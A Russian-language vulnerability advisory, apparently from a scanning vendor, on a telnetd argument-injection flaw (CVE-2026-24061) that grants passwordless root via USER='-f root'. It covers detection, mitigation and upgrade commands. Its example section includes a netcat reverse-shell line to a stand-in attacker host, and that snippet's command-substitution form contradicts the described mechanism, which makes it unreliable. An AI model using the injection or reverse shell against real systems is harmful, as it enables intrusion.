CVE-2026-24061: Критический обход аутентификации в GNU InetUtils Telnetd — Root-доступ
Критическая уязвимость инъекции аргументов в GNU InetUtils telnetd позволяет удаленным атакующим получить права root без пароля. Разбор эксплойта.
9.8
Оценка CVSS
КРИТИЧЕСКАЯ СЕРЬЁЗНОСТЬ
Вектор атаки: Сеть
Зрелость эксплойта: Доступен PoC
Патч доступен: Да (InetUtils 2.8+)
Активная эксплуатация: Ожидается
Кратко — Отключите Telnet сейчас!
- CVE-2026-24061 — критический обход аутентификации в telnetd
- Атакующие могут войти как root без пароля, используя переменную окружения
- Затронуты: GNU InetUtils версий с 1.9.3 по 2.7
- Решение: Обновите пакет или полностью отключите службу Telnet (Рекомендуется)
Что такое CVE-2026-24061?
CVE-2026-24061 — это критическая уязвимость обхода аутентификации, затрагивающая демон telnet (telnetd) в пакете GNU InetUtils. Уязвимость существует из-за неправильной нейтрализации разделителей аргументов при обработке переменной окружения USER, полученной от клиента.
Этот недостаток позволяет удаленному неаутентифицированному злоумышленнику заставить программу входа (login) авторизовать его как суперпользователя (root) без ввода пароля. Это классический пример инъекции аргументов (Argument Injection).
Уязвимость затрагивает GNU InetUtils версий с 1.9.3 по 2.7 включительно — широко распространённую реализацию telnet в Unix и Linux системах.
Визуализация процесса атаки
- Атакующий начинает Telnet-соединение
- Отправляется переменная окружения USER со значением '-f root'
- Telnetd передает переменную в /bin/login без проверки
- /bin/login воспринимает '-f' как флаг принудительного входа
- Предоставляется root-шелл без ввода пароля
Как это работает?
Уязвимость эксплуатирует взаимодействие между telnetd и системным бинарным файлом login. Протокол Telnet позволяет клиенту передавать переменные окружения. GNU InetUtils telnetd принимает переменную USER и передает её напрямую в командную строку /bin/login.
Если атакующий установит переменную USER в значение '-f root', команда, выполняемая демоном, фактически становится: login -p -h <host> -f root. Флаг -f указывает программе login пропустить аутентификацию для указанного пользователя (root). Поскольку telnetd не очищает этот ввод, атакующий получает доступ мгновенно.
Это классическая уязвимость инъекции аргументов — контролируемый пользователем ввод (переменная окружения USER) передается без санитизации в аргумент командной строки, позволяя атакующему внедрить дополнительные флаги, которые фундаментально меняют поведение программы.
Пример структуры эксплойта
# Connecting to vulnerable Telnet server
telnet target-server.com 23
# Sending malformed USER variable
USER $(malicious_command_here)
# Example: Reverse shell payload
USER $(nc attacker.com 4444 -e /bin/bash)
# Server executes embedded command with daemon privileges
Упрощённое представление. Реальный эксплойт включает установку переменной USER в '-f root' во время согласования Telnet.
Как обнаружить попытки эксплуатации
- [01]Логи входа пользователя root без запроса пароля
- [02]Telnet-сессии с необычными переменными окружения
- [03]Неожиданные входы root с внешних IP-адресов
- [04]Наличие строк '-f root' в логах аудита или сетевом трафике (порт 23)
Влияние и серьёзность
Оценка CVSS: 9.8 (Критическая)
Последствия катастрофичны для любой системы с этой уязвимой службой:
• Полная компрометация системы: Мгновенный root-доступ
• Без аутентификации: Не требуются логины или пароли
• Устаревший протокол: Telnet передает данные в открытом виде, а эта уязвимость делает его открытой дверью
Сценарии реального воздействия:
- Промышленные системы управления (ICS/SCADA), всё ещё использующие Telnet для управления
- Сетевое оборудование (маршрутизаторы, коммутаторы) с Telnet по умолчанию
- Встроенные устройства и IoT-системы с жёстко закодированными Telnet-службами
- Устаревшие Unix/Linux системы в корпоративных средах
- Удалённый доступ к критической инфраструктуре
Эта уязвимость особенно опасна, поскольку не требует взаимодействия с пользователем и может быть эксплуатирована простым Telnet-клиентом.
Сравнение способов защиты
| Mitigation | Effectiveness | Notes |
|---|---|---|
| Disable Telnet | 100% | Complete protection - recommended |
| Migrate to SSH | 100% | Secure alternative with encryption |
| Firewall blocking | High | Effective if properly configured |
| Vendor patches | Variable | Depends on vendor response time |
| Network segmentation | Medium | Reduces attack surface only |
Затронутые версии
Уязвимость затрагивает GNU InetUtils:
• Версия 1.9.3
• Вплоть до версии 2.7 включительно
Примечание: Другие реализации telnetd (например, netkit-telnet) могут не быть затронутыми, но GNU InetUtils распространён во многих дистрибутивах Unix и Linux.
Среды повышенного риска:
• Промышленные системы управления (ICS/SCADA), использующие GNU telnetd
• Устройства сетевой инфраструктуры с GNU InetUtils
• Устаревшие корпоративные серверы с уязвимыми версиями
• Встроенные Linux-системы с утилитами GNU по умолчанию
• Любая система с портом 23, открытым в недоверенные сети
Даже если ваша Telnet-служба доступна только внутри сети, она остаётся уязвимой для атак бокового движения, если атакующий получит первоначальный доступ к вашей сети.
Как исправить
Мы настоятельно рекомендуем полностью отключить Telnet. Это устаревший и небезопасный протокол. Используйте SSH.
Вариант 1: Отключить Telnetd (Рекомендуется)
Остановите службу и уберите её из автозагрузки.
# Для систем с systemd
sudo systemctl stop telnet.socket
sudo systemctl disable telnet.socket
# Или полностью удалите пакет
sudo apt-get remove inetutils-telnetdВариант 2: Обновление
Если использование telnet необходимо, обновите GNU InetUtils до версии выше 2.7 (например, 2.8+) или примените патчи безопасности от вашего поставщика ОС.
Для обновления GNU InetUtils:
Обновление InetUtils
# Обновление репозиториев
sudo apt-get update
# Обновление inetutils
sudo apt-get install --only-upgrade inetutils-telnetdКак проверить уязвимость
Если вы используете уязвимую версию GNU InetUtils, вы, вероятно, под угрозой.
Проверьте версию InetUtils:
# Проверить версию telnetd
telnetd --version
# Проверить, установлен ли пакет inetutils-telnetd
dpkg -l | grep inetutils-telnetd
rpm -qa | grep inetutilsTEPTEZ может автоматически просканировать вашу инфраструктуру на наличие этой и других CVE. Наша платформа обнаруживает открытые сервисы и предоставляет рекомендации по устранению.
Ссылки
Защитите вашу инфраструктуру с TEPTEZ
TEPTEZ непрерывно сканирует вашу сеть на открытые сервисы вроде Telnet, идентифицирует CVE-уязвимости и предоставляет автоматизированное руководство по устранению.
Начать бесплатное сканирование